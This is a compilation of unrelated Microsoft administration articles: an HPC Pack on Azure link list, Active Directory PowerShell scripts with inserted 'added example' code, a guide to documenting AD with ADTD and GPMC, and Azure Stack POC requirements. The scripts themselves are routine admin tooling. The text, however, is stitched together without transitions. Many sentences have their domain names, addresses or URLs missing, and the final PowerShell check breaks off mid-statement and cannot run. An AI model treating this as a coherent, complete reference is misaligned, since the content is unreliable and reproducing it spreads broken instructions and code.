Options to create and manage a high performance computing (HPC) cluster in Azure with Microsoft HPC Pack

Azure has two different deployment models for creating and working with resources: Resource Manager and classic. This article covers using both models, but Microsoft recommends that most new deployments use the Resource Manager model.

Take advantage of Microsoft HPC Pack and Azure compute and infrastructure services to create and manage a cloud-based high performance computing (HPC) cluster. HPC Pack is Microsoft’s free HPC solution built on Microsoft Azure and Windows Server technologies and supports both Windows and Linux HPC workloads. A cloud-based HPC Pack cluster provides a cluster administrator or independent software vendor (ISV) a flexible, scalable platform to run compute-intensive applications while reducing investment in an on-premises compute cluster infrastructure.

Run an HPC Pack cluster in Azure VMs
Azure templates

(Marketplace) HPC Pack cluster for Windows workloads

(Marketplace) HPC Pack cluster for Excel workloads

(Marketplace) HPC Pack cluster for Linux workloads

(Quickstart) Create an HPC cluster

(Quickstart) Create an HPC cluster with Linux compute nodes

(Quickstart) Create an HPC cluster with custom compute node image

Azure VM images

HPC Pack on Windows Server 2012 R2

HPC Pack compute node on Windows Server 2012 R2

HPC Pack compute node with Excel on Windows Server 2012 R2

PowerShell deployment script

Create an HPC cluster with the HPC Pack IaaS deployment script

Tutorial: Get started with Linux compute nodes in an HPC Pack cluster in Azure

Tutorial: Run NAMD with Microsoft HPC Pack on Linux compute nodes in Azure

Tutorial: Run OpenFOAM with Microsoft HPC Pack on a Linux RDMA cluster in Azure

Tutorial: Get started with an HPC Pack cluster in Azure to run Excel and SOA workloads

Manual deployment with the Azure portal

Set up the head node of an HPC Pack cluster in an Azure VM

Cluster management

Manage compute nodes in an HPC Pack cluster in Azure

Grow and shrink Azure compute resources in an HPC Pack cluster

Submit jobs to an HPC Pack cluster in Azure

Add worker role nodes to an HPC Pack cluster

Burst to Azure worker instances with HPC Pack

Tutorial: Set up a hybrid cluster with HPC Pack in Azure

Add Azure “burst” nodes to an HPC Pack head node in Azure

Grow and shrink Azure compute resources in an HPC Pack cluster

Integrate with Azure Batch

Burst to Azure Batch with HPC Pack

Create RDMA clusters for MPI workloads

Set up a Windows RDMA cluster with HPC Pack to run MPI applications

Tutorial: Run OpenFOAM with Microsoft HPC Pack on a Linux RDMA cluster in Azure

Set up a Linux RDMA cluster to run MPI applications

List Group Members in Active Directory

This script can be used to list group membership in Active Directory. As the following screenshot shows, the script reads an input file called GList.csv that contains the group names (one distinguished name per row, in a GroupName column). You will see the output on the screen as well as in the GroupDetails.csv file.

# This script can be used to list group membership in Active Directory
# Input:  C:\Scripts\GList.csv with a "GroupName" column holding each group's distinguished name
# Output: C:\Scripts\GroupDetails.csv (each group name followed by its direct members)
$GFile = New-Item -Type File -Force "C:\Scripts\GroupDetails.csv"
Import-Csv "C:\Scripts\GList.csv" | ForEach-Object {
    $GName = $_.GroupName
    # bind to the group with ADSI; the "member" attribute holds the DN of every direct member
    $group = [ADSI] "LDAP://$GName"
    Write-Output $GName
    $GName | Out-File $GFile -Encoding ASCII -Append
    foreach ($member in $group.member) {
        # bind to each member DN and record its name (nested groups are listed but not expanded)
        $Uname = New-Object DirectoryServices.DirectoryEntry("LDAP://$member")
        Write-Output $Uname.Name
        $Uname.Name | Out-File $GFile -Encoding ASCII -Append
    }
}



When working with Active Directory there are a number of PowerShell commands and scripts that you can use to manage it. I have put together a list of the top scripts that you can use to complete the most common tasks I have come across while supporting AD.

1.) Create Active Directory Users Based On Excel Input

This script will allow you to create users using data from an Excel/CSV file. You can enter all the different attributes you want set on the user accounts during creation (e.g. department, manager, telephone number) as columns in the file. It uses the New-ADUser PowerShell cmdlet.

2.) Active Directory Password Expiry Email Notification

This is a great script that will email your users when their password is due to expire. It helps reduce the helpdesk calls to reset users' passwords when their accounts lock out after expiration. Simply run the script as a scheduled task and it will check AD for any accounts near expiration and send them an email reminder.
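The following is an added example of the technique described above, not the notification script referenced by the author. It reads the constructed attribute msDS-UserPasswordExpiryTimeComputed (which already accounts for fine-grained password policies) to find enabled users whose password expires within a window, then mails them. It assumes the ActiveDirectory module, an SMTP relay that accepts mail from this host, and a populated mail attribute; the SMTP server, sender address and function names are placeholders.

```powershell
# Added example (not the page's script): warn users whose password expires within N days.
# Assumes the ActiveDirectory module and an SMTP relay; server/sender values are placeholders.
function Get-ExpiringPasswords {
    param([int]$WithinDays = 14)
    $now = Get-Date
    # Skip disabled accounts and accounts flagged "password never expires" up front
    Get-ADUser -Filter { Enabled -eq $true -and PasswordNeverExpires -eq $false } `
               -Properties 'msDS-UserPasswordExpiryTimeComputed', mail |
        ForEach-Object {
            $raw = $_.'msDS-UserPasswordExpiryTimeComputed'
            # 0 or Int64.MaxValue means the password does not expire (e.g. password not required)
            if (-not $raw -or $raw -eq [long]::MaxValue) { return }
            $expires  = [datetime]::FromFileTime($raw)
            $daysLeft = [int][math]::Ceiling(($expires - $now).TotalDays)
            if ($daysLeft -ge 0 -and $daysLeft -le $WithinDays) {
                [pscustomobject]@{
                    SamAccountName = $_.SamAccountName
                    Mail           = $_.mail
                    Expires        = $expires
                    DaysLeft       = $daysLeft
                }
            }
        }
}

function Send-ExpiryReminder {
    param(
        [Parameter(ValueFromPipeline)][pscustomobject]$User,
        [string]$SmtpServer = 'smtp.example.com',   # placeholder
        [string]$From = 'helpdesk@example.com'      # placeholder
    )
    process {
        # No mail attribute: nothing to notify; in production write this to a log for the helpdesk
        if (-not $User.Mail) { return }
        $body = "Your password expires on $($User.Expires.ToString('yyyy-MM-dd')) " +
                "($($User.DaysLeft) day(s) left). Press Ctrl+Alt+Del and choose 'Change a password'."
        Send-MailMessage -SmtpServer $SmtpServer -From $From -To $User.Mail `
            -Subject "Your password expires in $($User.DaysLeft) day(s)" -Body $body
    }
}

# Scheduled-task entry point: one pass, one mail per user inside the window
Get-ExpiringPasswords -WithinDays 14 | Send-ExpiryReminder
```

Using the computed expiry attribute rather than pwdLastSet plus the domain maximum password age matters in domains with fine-grained password policies, where different users have different maximum ages.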

3.) Get Active Directory User Account Last Logged On Time

This is a useful script to find out when a user last logged onto a computer in the domain. You can also import users from a CSV file if you want to check a list of users.
Example 1: Type Get-OSCLastLogonTime -SamAccountName "lindawang","doris" in the Windows PowerShell console.
Example 2: Type Get-OSCLastLogonTime -CsvFilePath "C:\SamAccountName.csv" in the Windows PowerShell console.
This command will list the last logon time of each user named in the specified CSV file.
Note: the CSV file must follow the format below:

4.) Find Out What Computer Locked Users Account Get-LockedOutLocation

This script will query the PDC emulator for event ID 4740 and find out which computer caused a user's account to become locked out. The function also displays the BadPasswordTime attribute from each domain controller to aid further troubleshooting. It works with domain controllers running Windows Server 2008 SP2 and up.
    PS C:\> Get-LockedOutLocation -Identity Joe.Bloggs
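The following is an added example implementing the two lookups described above; it is not the Get-LockedOutLocation script itself. It assumes the ActiveDirectory module, rights to read the Security log on the PDC emulator, and that account lockout auditing is enabled; the function names are illustrative.

```powershell
# Added example (not the page's Get-LockedOutLocation): locate the source of a lockout.
# Assumes the ActiveDirectory module and read access to the PDC emulator's Security log.
function Get-LockoutEvents {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [int]$Hours = 24
    )
    # Every DC forwards lockouts to the PDC emulator, so it is the single place to query
    $pdc = (Get-ADDomain).PDCEmulator
    $filter = @{ LogName = 'Security'; Id = 4740; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $pdc -FilterHashtable $filter -ErrorAction SilentlyContinue |
        # Event 4740 EventData: [0] TargetUserName, [1] TargetDomainName = caller computer name
        Where-Object { $_.Properties[0].Value -eq $SamAccountName } |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated    = $_.TimeCreated
                User           = $_.Properties[0].Value
                CallerComputer = $_.Properties[1].Value
                ReportedBy     = $pdc
            }
        }
}

function Get-BadPasswordTimes {
    param([Parameter(Mandatory)][string]$SamAccountName)
    # badPasswordTime and badPwdCount are NOT replicated: each DC only knows the failures it
    # saw itself, so the DC with the newest value is the one the bad passwords were sent to.
    Get-ADDomainController -Filter * | ForEach-Object {
        $u = Get-ADUser -Identity $SamAccountName -Server $_.HostName -Properties badPasswordTime, badPwdCount
        [pscustomobject]@{
            DC              = $_.HostName
            BadPasswordTime = if ($u.badPasswordTime) { [datetime]::FromFileTime($u.badPasswordTime) } else { $null }
            BadPwdCount     = $u.badPwdCount
        }
    }
}

Get-LockoutEvents   -SamAccountName 'Joe.Bloggs' | Format-Table -AutoSize
Get-BadPasswordTimes -SamAccountName 'Joe.Bloggs' | Sort-Object BadPasswordTime -Descending | Format-Table -AutoSize
```

The caller computer name in 4740 is whatever the client reported, so when it is a server name (Exchange, a web front end, a jump host) the next step is that server's own logon failures (event 4625), not the workstation the user sits at.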

5.) Active Directory Audit Report

This is a PowerShell script that will generate a report gathering information about your Active Directory environment and export the results as HTML or PDF.
The list of items that the audit report will generate are as follows:
Forest Level Audit Report
  • Forest Information
    • Forest Summary
      • Name/Functional Level
      • Domain/Site/DC/GC/Exchange/Lync/Pool counts
    • Forest Features
      • Tombstone Lifetime
      • Recycle Bin Enabled
      • Lync AD Container
    • Exchange Servers
      • Organization/Administrative Group/Name/Roles/Site
      • Serial/Product ID
    • Lync
      • Element (Server/Pool)
      • Type (Internal/Edge/Backend/Pool)
      • Name/FQDN
  • Site Information
    • Summary
      • Site Name/Location/Domains/DCs/Subnets
    • Details
      • Site Name/Options/ISTG/Links/Bridgeheads/Adjacencies
    • Subnets
      • Subnet/Site Name/Location
    • Site Connections
      • Enabled/Options/From/To
    • Site Links *new*
      • Name/Replication Interval/Sites
  • Domain Information
    • Domains
      • Name/NetBIOS/Functional Level/Forest Root/RIDs Issued/RIDs Remaining *new*
    • Domain Password Policies
      • Name/NetBIOS/Lockout Threshold/Pass History Length/Max Pass Age/Min Pass Age/Min Pass Length
    • Domain Controllers
      • Domain/Site/Name/OS/Time/IP/GC/FSMO Roles
    • Domain Trusts
      • Domain/Trusted Domain/Direction/Attributes/Trust Type/Created/Modified
    • Domain DFS Shares
      • Domain/Name/DN/Remote Server
    • Domain DFSR Shares *new*
      • Domain/Name/Content/Remote Servers
    • AD Integrated DNS Zones
    • Group Policy Object Information
Domain Level Audit Report
  • Account Statistics (count) 1
    • Total User Accounts
    • Enabled
    • Disabled
    • Locked
    • Password Does Not Expire
    • Password Must Change
  • Account Statistics (count) 2
    • Password Not Required
    • Dial-in Enabled
    • Control Access With NPS
    • Unconstrained Delegation
    • Not Trusted For Delegation
    • No Pre-Auth Required
  • Group Statistics
    • Total Groups
    • Built-in
    • Universal Security
    • Universal Distribution
    • Global Security
    • Global Distribution
    • Domain Local Security
    • Domain Local Distribution
  • Privileged Group Statistics
    • Default Priv Group Name
    • Current Group Name (if it were changed)
    • Member Count
  • Privileged Group Membership for the following groups
    • Enterprise Admins
    • Schema Admins
    • Domain Admins
    • Administrators
    • Cert Publishers
    • Account Operators
    • Server Operators
    • Backup Operators
    • Print Operators
  • Account information for the prior sections:
    • Logon ID
    • Name
    • Password Age (Days)
    • Last Logon Date
    • Password Does Not Expire
      • Password Reversible
    • Password Not Required
Screenshots of diagrams and reports which can be generated from the script
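The following is an added example, not the audit report script itself, showing how the account statistics and privileged group counts listed under "Domain Level Audit Report" can be computed with the ActiveDirectory module. The userAccountControl bits are matched with the LDAP_MATCHING_RULE_BIT_AND rule (OID 1.2.840.113556.1.4.803); the function names are illustrative.

```powershell
# Added example (not the page's audit script): the "Account Statistics" and
# "Privileged Group Statistics" sections of the report, computed from AD.
function Get-AccountStatistics {
    # userAccountControl flag values (constants from MS-ADTS / Microsoft KB 305144)
    $uac = @{
        Disabled                = 2
        PasswordNotRequired     = 32
        PasswordReversible      = 128      # ENCRYPTED_TEXT_PWD_ALLOWED
        PasswordDoesNotExpire   = 65536
        UnconstrainedDelegation = 524288   # TRUSTED_FOR_DELEGATION
        NotTrustedForDelegation = 1048576  # NOT_DELEGATED (account is sensitive)
        NoPreAuthRequired       = 4194304  # DONT_REQ_PREAUTH
    }
    $stats = [ordered]@{
        TotalUserAccounts  = @(Get-ADUser -Filter *).Count
        Locked             = @(Search-ADAccount -LockedOut -UsersOnly).Count
        PasswordMustChange = @(Get-ADUser -LDAPFilter '(pwdLastSet=0)').Count
    }
    foreach ($name in $uac.Keys) {
        # bitwise AND match: the flag is set in userAccountControl
        $ldap = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=$($uac[$name])))"
        $stats[$name] = @(Get-ADUser -LDAPFilter $ldap).Count
    }
    $stats.Enabled = $stats.TotalUserAccounts - $stats.Disabled
    [pscustomobject]$stats
}

function Get-PrivilegedGroupMembers {
    # The groups the report enumerates; Enterprise/Schema Admins exist only in the forest root
    $groups = 'Enterprise Admins','Schema Admins','Domain Admins','Administrators',
              'Cert Publishers','Account Operators','Server Operators','Backup Operators','Print Operators'
    foreach ($g in $groups) {
        # -Recursive expands nested groups so indirect members are counted too
        $members = @(Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue)
        [pscustomobject]@{
            Group       = $g
            MemberCount = $members.Count
            Members     = ($members.SamAccountName -join ', ')
        }
    }
}

Get-AccountStatistics        | Format-List
Get-PrivilegedGroupMembers   | Format-Table -AutoSize
```

The counts in the second statistics block (no pre-authentication required, unconstrained delegation, password not required, reversible encryption) are the ones worth tracking over time: each should normally be zero or a short, known list, and any growth is a change-control question.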

6.) Generate Excel report based on Active Directory user objects

This script will generate a report in Excel showing details about user objects. The report will include the following:
  • Active / Inactive User Accounts
  • Accounts Locked Out
  • Accounts Disabled
  • Expired Passwords
  • Passwords older than a set number of days
  • Passwords set to never expire
  • Password not required flag set
  • And many more options
This can run against your domain or your entire forest.

7.) Get Inactive User in Domain based on Last Logon Time Stamp

A script to find inactive or stale users in your domain and export the results to CSV. Simply set how many days to check back from the last time a user logged in.
# Gets time stamps for all users in the domain that have NOT logged in since the specified date
# Mod by Tilo 2014-04-01
# Note: lastLogonTimestamp is only replicated when it is more than 9-14 days out of date,
# so treat the result as accurate to roughly two weeks.

Import-Module ActiveDirectory
$domain = ""
$DaysInactive = 90
$time = (Get-Date).AddDays(-($DaysInactive))
# Get all enabled AD users whose lastLogonTimestamp is older than our cutoff
# (the AD provider converts the DateTime in the filter to the attribute's file-time format)
Get-ADUser -Filter {LastLogonTimeStamp -lt $time -and Enabled -eq $true} -Properties LastLogonTimeStamp |
    # Output Name and lastLogonTimestamp into CSV (HH gives a 24-hour clock; hh would be ambiguous)
    Select-Object Name, @{Name="Stamp"; Expression={[DateTime]::FromFileTime($_.lastLogonTimestamp).ToString('yyyy-MM-dd_HH:mm:ss')}} |
    Export-Csv OLD_User.csv -NoTypeInformation

8.) List Group Members in Active Directory

Run this script to get a list of the members of your AD groups. Simply add the groups you would like to check to a CSV file, run the script against it, and it will export a list of the members of each group.
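The following is an added example that serves both the ADSI script earlier on the page and item 8; it is not the author's script. Where Get-ADGroupMember -Recursive flattens nested groups, this walks the member attribute itself so the output records the nesting path through which each member was inherited, and it guards against membership cycles. It assumes the ActiveDirectory module and uses the same GList.csv / GroupDetails.csv file names as the page.

```powershell
# Added example (not the page's script): expand group membership, keeping the nesting path.
# Assumes the ActiveDirectory module; the CSV paths follow the page's convention.
function Expand-GroupMembership {
    param(
        [Parameter(Mandatory)][string]$GroupIdentity,
        [string]$Path = '',
        # shared across one top-level expansion so a group is only walked once (cycle guard)
        [System.Collections.Generic.HashSet[string]]$Seen = (New-Object 'System.Collections.Generic.HashSet[string]')
    )
    $group = Get-ADGroup -Identity $GroupIdentity -Properties member
    $here  = if ($Path) { "$Path > $($group.Name)" } else { $group.Name }
    # Add returns $false if the DN is already in the set: cycle or diamond, do not expand again
    if (-not $Seen.Add($group.DistinguishedName)) { return }
    foreach ($dn in $group.member) {
        $obj = Get-ADObject -Identity $dn -Properties sAMAccountName -ErrorAction SilentlyContinue
        if (-not $obj) {
            # e.g. a foreign security principal from a trusted domain that this domain cannot resolve
            [pscustomobject]@{ Group = $group.Name; Member = $dn; ObjectClass = 'unresolved'; Via = $here }
        } elseif ($obj.objectClass -eq 'group') {
            Expand-GroupMembership -GroupIdentity $dn -Path $here -Seen $Seen
        } else {
            [pscustomobject]@{
                Group       = $group.Name
                Member      = $obj.sAMAccountName
                ObjectClass = $obj.objectClass   # user, computer, msDS-GroupManagedServiceAccount, ...
                Via         = $here
            }
        }
    }
}

Import-Csv 'C:\Scripts\GList.csv' | ForEach-Object {
    Expand-GroupMembership -GroupIdentity $_.GroupName
} | Export-Csv 'C:\Scripts\GroupDetails.csv' -NoTypeInformation
```

The Via column is what makes the output reviewable: an account that is in Domain Admins only through three levels of nesting is the one that tends to be missed in a flat listing.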

Documenting Active Directory Infrastructure the Easy Way

Hi, Ned here. From time to time customers ask us what their options are to document their Active Directory environments – site topologies, domains and trusts, where group policies are linked and what their settings are. Until recently we didn’t have an easy way to do this and they were forced to invest a lot of manual labor in creating a map. Today we’ll talk about some free tools we can use to make this task very easy and accurate. I’m going to focus on the most common areas:
•    Domain and Forest information 
•    OU Structures 
•    Sites 
•    Exchange 
•    Group Policy settings and links
To do this we’re going to use two automation utilities that you will need to download and install:
For the ADTD you will also need Microsoft Office Visio 2003 or 2007 and .NET 2.0 Framework. If you’re using the GPMC that comes with Windows Vista you will need to download the GPMC scripts separately. For this example we’ll assume you’re on XP.
GPMC is a centralized management and reporting tool for administering group policy. It includes some very useful (and well-hidden) scripts. ADTD is a newly released tool that can interrogate domain controllers about configuration data and create Visio diagrams that document your environment. When combined using the techniques below, that extremely boring and time-consuming documentation project you had in front of you is only going to take hours instead of weeks, leaving you free for more important things.
So let’s get started:
1. Install Visio, ADTD, and GPMC on a Windows XP Professional workstation or Windows Server 2003 server.
2. Start ADTD (it’s called ‘Microsoft Active Directory Topology Diagrammer’ on the Start Menu)
3. Now we’ll walk through the settings tabs to configure our data collection:
Enter in a local (to you) Global Catalog Domain Controller that you can interrogate with the tool. The actual LDAP queries to the GC only take a few seconds in most cases and should not generate any appreciable load – most of the heavy lifting in ADTD is local to your client in Visio. Add your trust settings (if you have more than one domain or multiple forests with trusts). You can also count your users per domains and identify all your GC’s. Using the default of ‘Use DNS and connect to each domain’ means that the tool will also connect to one DC in any trusting domains as well, but again, the amount of data returned will tend to be fairly small.
On the OU’s tab you can select to draw out all your Organizational Units. Most of the time you’ll want to avoid limiting the depth, since otherwise your diagram will be incomplete.
On the Sites tab you can specify that Site Links, Replication Connections, and subnets are drawn. Avoid using the ‘suppress empty sites’ setting as it’s useful to see locations using Automatic Site Coverage.
If you’re using Microsoft Exchange the Exchange tab can help diagram your Exchange Organization, where the connections are, the number of mailboxes per server, and even tie them to their logical AD sites so that you know which DC/GC combinations are servicing your messaging infrastructure.
If you’re using Windows Server 2003 domain or forest-based AD-integrated DNS, you can also opt to show which DC’s are hosting those partitions.
Finally, with ADTD you can get additional server information such as fully qualified domain names, operating systems and service pack, then color-code them for easier reading. This is especially useful in extremely large, complex environments where DC’s from many different domains are collocated in the same AD site within the same forest.
4. To execute your query, click Discover. After a few moments it will complete the LDAP lookups and will gray out. Click Draw, and go get a cup of coffee (or lunch, if you’re running hundreds of DC’s) – Visio will crank away creating all of the diagrams for some time. When it’s done, control will return to the ADTD application and you can close it.
So now we have some Visio diagrams that will be in your My Documents folder (by default; you can change this in ADTD’s options menu). In the example below we have:
  • A domain called with two DC’s and an Exchange server.
  • A child domain called with a single DC.
  • An externally-trusted domain called
  • An externally-trusted child domain called
So let’s look at what Visio gave us:
Above is the AD Domains.vsd. It shows our four domains and their trusts. Let’s zoom in on the FABRIKAM domain:
We have 45 total users on our two DC’s. All the FSMO role holders are identified, as well as the schema version and what domain functional mode we’re in. If we move on to the AD Sites.vsd:
We can see that my forest has two sites, has several subnets bound to them, and there are connections between the DC’s. Let’s zoom in on that Main-Office site:
Nifty – we can see the GC’s, the subnet details, the intra and inter-site connections, the Site Link costs and schedule, and even the DC running the ISTG. If you want more detail on all these components check out the highly detailed How Active Directory Replication Topology Works.
Moving on to the AD Application Partitions.vsd, we can see that only two root domain DC’s are using 2003-style integrated DNS:
Since we have an Exchange 2003 server in this environment, Ex Organization.vsd shows us that it has affinity with the Main-Office site.
By zooming in we can see that server 2003SRV12 is part of the ‘First Administrative Group’ and is running Exchange 2003 Service Pack 2. It has 32 mailboxes. Any DC/GC lookups it’s doing should be happening against the two DC’s in this site.
Finally for ADTD, we come to the OU diagram. The diagrammer can list out all the OU’s (below is a snippet), but other than telling us that a Group Policy Object is linked to a given location, it doesn’t give much about the policies themselves.
So here’s where GPMC scripting kicks in:
1. We open a CMD prompt on our data gathering machine and (assuming we installed to the default path) navigate to:
C:\Program Files\GPMC\Scripts
2. We type:
MD c:\GPMCReports
3. We execute (using our example domain):
Cscript ListSOMPolicyTree.wsf / > c:\gpmcreports\fabrikamgpotree.txt
4. This returns us the c:\gpmcreports\fabrikamgpotree.txt. If we open it we see:
=== GPO Links for domain ===
      GPO=Default Domain Policy 
   OU=Domain Controllers 
         GPO=Default Domain Controllers Policy 
            GPO=Logoff Screensaver 
                  GPO=Password Screensaver 
         GPO=No Boot
=== GPO Links for sites in forest DC=fabrikam,DC=com ===
5. We execute in our command prompt:
Cscript GetReportsForAllGPOs.wsf c:\gpmcreports /
6. This returns all of our policy settings for to the c:\gpmcreports folder:
== Found 6 GPOs in
Generating XML report for GPO ‘No Boot’ 
Generating HTML report for GPO ‘No Boot’
Generating XML report for GPO ‘Default Domain Policy’ 
Generating HTML report for GPO ‘Default Domain Policy’
Generating XML report for GPO ‘Logoff Screensaver’ 
Generating HTML report for GPO ‘Logoff Screensaver’
Generating XML report for GPO ‘Password Screensaver’ 
Generating HTML report for GPO ‘Password Screensaver’
Generating XML report for GPO ‘Default Domain Controllers Policy’ 
Generating HTML report for GPO ‘Default Domain Controllers Policy’
Generating XML report for GPO ‘AllCheck’ 
Generating HTML report for GPO ‘AllCheck’
Report generation succeeded for 12 reports. 
Report generation failed for 0 reports.
7. If we open one of these HTML reports, we can see everything there is to know about that policy. For example, we’ll open the ‘Password Screensaver’ GPO which is linked at OU ‘nested4’; there’s great stuff here…
Like settings detail above.
Or version history and status.
Or delegation.
Since all this is HTML and XML, you could simply link these live into your OU VSD’s, or get fancier and automate the importation of XML data (using Visio skills far better than mine!). Worst case you’re doing a little copying and pasting from fabrikamgpotree.txt to update your GPO information instead of hand-crafting thousands of objects and settings.
Now all you need is that $20,000 color plotter so you can print out your diagram wall-sized…
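The following is an added example, not part of the post or of the GPMC script pack, that produces the same two artifacts (a tree of GPO links per container, and an HTML plus XML report per GPO) using the GroupPolicy and ActiveDirectory modules that ship with RSAT on current Windows versions, which is the current equivalent of the WSF scripts the post uses. It assumes both modules are installed and reuses the post's C:\GPMCReports output folder; it does not cover site-linked GPOs, which Get-GPInheritance cannot target.

```powershell
# Added example (not the post's GPMC scripts): GPO link tree and per-GPO reports via the
# GroupPolicy module. Assumes the GroupPolicy and ActiveDirectory modules are installed.
Import-Module GroupPolicy, ActiveDirectory
$out = 'C:\GPMCReports'
New-Item -ItemType Directory -Force -Path $out | Out-Null

# 1. GPO links for the domain root and every OU, with link state, enforcement and order
$domain  = Get-ADDomain
$targets = @($domain.DistinguishedName) +
           (Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName)
$links = foreach ($t in $targets) {
    $inh = Get-GPInheritance -Target $t
    foreach ($l in $inh.GpoLinks) {
        [pscustomobject]@{
            Container    = $t
            GPO          = $l.DisplayName
            Enabled      = $l.Enabled
            Enforced     = $l.Enforced
            Order        = $l.Order
            BlockInherit = $inh.GpoInheritanceBlocked   # "Block Inheritance" set on this container
        }
    }
}
$links | Sort-Object Container, Order | Export-Csv (Join-Path $out 'gpotree.csv') -NoTypeInformation

# 2. One HTML and one XML report per GPO, named by GUID so a renamed GPO does not overwrite another
foreach ($gpo in Get-GPO -All) {
    foreach ($type in 'Html', 'Xml') {
        $file = Join-Path $out ("{0}.{1}" -f $gpo.Id, $type.ToLower())
        Get-GPOReport -Guid $gpo.Id -ReportType $type -Path $file
    }
}

# 3. GPOs that are linked nowhere: worth listing, because they clutter the documentation
#    and are often forgotten settings that someone will re-link one day
$linked = $links.GPO | Sort-Object -Unique
Get-GPO -All | Where-Object { $_.DisplayName -notin $linked } |
    Select-Object DisplayName, Id, GpoStatus, ModificationTime
```

The CSV from step 1 is the machine-readable version of fabrikamgpotree.txt, which makes it easy to diff two runs taken weeks apart and see which links, enforcement flags or inheritance blocks changed.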

Before you deploy Azure Stack POC (Proof of Concept)

Before you deploy Azure Stack POC (Proof of Concept), make sure your computer meets the following requirements.

Operating system

OS version: Windows Server 2016 Datacenter Edition Technical Preview 4 with the latest updates installed, including KB 3124262.
Install method: Clean install. You can use the WindowsServer2016Datacenter.vhdx provided in the deployment package to quickly install the operating system on your Azure Stack POC machine. If you don’t use the WindowsServer2016Datacenter.vhdx, you must manually install the operating system, updates, and KB 3124262.
Domain joined? No.



One available port on a switch for the POC machine.  
The Azure Stack POC machine supports connecting to a switch access port or trunk port. No specialized features are required on the switch. If you are using a trunk port or if you need to configure a VLAN ID, you have to provide the VLAN ID as a deployment parameter. For example:
DeployAzureStack.ps1 -Verbose -PublicVLan 305


Do not connect the POC machine to the subnets,, or These are reserved for the internal networks within the Microsoft Azure Stack POC environment.


Only IPv4 is supported. You cannot create IPv6 networks.


Make sure there is a DHCP server available on the network that the NIC connects to. If DHCP is not available, you must prepare an additional static IPv4 address besides the one used by the host. You must provide that IP address and its gateway as deployment parameters. For example:
DeployAzureStack.ps1 -Verbose -NATVMStaticIP -NATVMStaticGateway

Internet access

Make sure the NIC can connect to the Internet. Both the host IP and the new IP assigned to the NATVM (by DHCP or static IP) must be able to reach the Internet. Ports 80 and 443 are used under the and domains.


If a proxy is required in your environment, specify the proxy server address and port as a deployment parameter. For example:
DeployAzureStack.ps1 -Verbose -ProxyServer
Azure Stack POC does not support proxy authentication. 


Port 443 (HTTPS) must be open for your network. The client end-point is

Microsoft Azure Active Directory accounts

To deploy Azure Stack POC, you must have a valid Microsoft Azure AD account that is the directory administrator for at least one Azure Active Directory. If you don’t have any existing Azure AD account, you can create one for free at (in China, visit instead.)
This Azure AD account is used as the service administrator account for the environment. The service administrator can configure and manage resource clouds, user accounts, tenant plans, quotas, and pricing. In the portal, they can create website clouds, virtual machine private clouds, create plans, and manage user subscriptions.
Save these credentials for use in step 6 of Run the PowerShell deployment script. This will be the day 0 administrator.
You should also create at least one account so you can sign in to the Azure Stack POC as a tenant. Or add users from other AD accounts into your tenant accounts. See Appendix A for instructions on how to add a user in Azure Active Directory.
The Azure Stack POC supports Azure Active Directory authentication only.
Azure Active Directory account                               Supported?
Organization ID with valid Public Azure Subscription         Yes
Microsoft Account with valid Public Azure Subscription       Yes
Organization ID with valid China Azure Subscription          Yes
Organization ID with valid US Government Azure Subscription  No


These requirements apply to the Azure Stack POC only and might change for future releases.
Component: Compute: CPU
  Minimum:     Dual-Socket: 12 Physical Cores
  Recommended: Dual-Socket: 16 Physical Cores
Component: Compute: Memory
  Minimum:     96 GB RAM
  Recommended: 128 GB RAM
Component: Compute: BIOS
  Minimum:     Hyper-V Enabled (with SLAT support)
  Recommended: Hyper-V Enabled (with SLAT support)
Component: Network: NIC
  Minimum:     Windows Server 2012 R2 Certification required for NIC; no specialized features required
  Recommended: Windows Server 2012 R2 Certification required for NIC; no specialized features required
Component: Disk drives: Operating System
  Minimum:     1 OS disk with a minimum of 200 GB available for the system partition (SSD or HDD)
  Recommended: 1 OS disk with a minimum of 200 GB available for the system partition (SSD or HDD)
Component: Disk drives: General Azure Stack POC Data
  Minimum:     4 disks. Each disk provides a minimum of 140 GB of capacity (SSD or HDD).
  Recommended: 4 disks. Each disk provides a minimum of 250 GB of capacity.
Component: HW logo certification
  Minimum:     Certified for Windows Server 2012 R2
  Recommended: Certified for Windows Server 2012 R2
Data disk drive configuration: All data drives must be of the same type (SAS or SATA) and capacity. If SAS disk drives are used, the disk drives must be attached via a single path (no MPIO; multi-path support is not provided).
HBA configuration options:
  1. (Preferred) Simple HBA
  2. RAID HBA – Adapter must be configured in “pass through” mode
  3. RAID HBA – Disks should be configured as Single-Disk, RAID-0
Supported bus and media type combinations
  • RAID SSD (If the media type is unspecified/unknown*)
* RAID controllers without pass-through capability can’t recognize the media type. Such controllers will mark both HDD and SSD as Unspecified. In that case, the SSD will be used as persistent storage instead of caching devices. Therefore, you can deploy the Microsoft Azure Stack POC on those SSDs.
Example HBAs: LSI 9207-8i, LSI-9300-8i, or LSI-9265-8i in pass-through mode
Sample OEM configurations are available.
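The following is an added example, not part of the Azure Stack POC documentation, that checks a host against the requirements listed above before DeployAzureStack.ps1 is run. The KB number and the thresholds come from the page; the function name is illustrative. Run it in an elevated PowerShell session on the intended POC host.

```powershell
# Added example (not from the Azure Stack documentation): pre-deployment host check.
# Thresholds and the KB number are the ones stated in the requirements above.
function Test-AzureStackPocHost {
    $os   = Get-CimInstance Win32_OperatingSystem
    $cs   = Get-CimInstance Win32_ComputerSystem
    $cpu  = @(Get-CimInstance Win32_Processor)
    $cores = ($cpu | Measure-Object NumberOfCores -Sum).Sum
    # data disks = everything that is neither the boot nor the system disk
    $dataDisks = @(Get-Disk | Where-Object { -not $_.IsBoot -and -not $_.IsSystem })
    $busTypes  = @(Get-PhysicalDisk | Select-Object -ExpandProperty BusType -Unique)
    # Note: VirtualizationFirmwareEnabled reads $false once a hypervisor is already running,
    # so on a host where Hyper-V is already enabled this check is expected to report "fail".
    $slatOk = ($cpu | ForEach-Object { $_.VirtualizationFirmwareEnabled -and $_.SecondLevelAddressTranslationExtensions }) -notcontains $false

    @(
        [pscustomobject]@{ Check = 'OS is Windows Server 2016 Datacenter'; Pass = ($os.Caption -like '*Server 2016*Datacenter*'); Value = $os.Caption }
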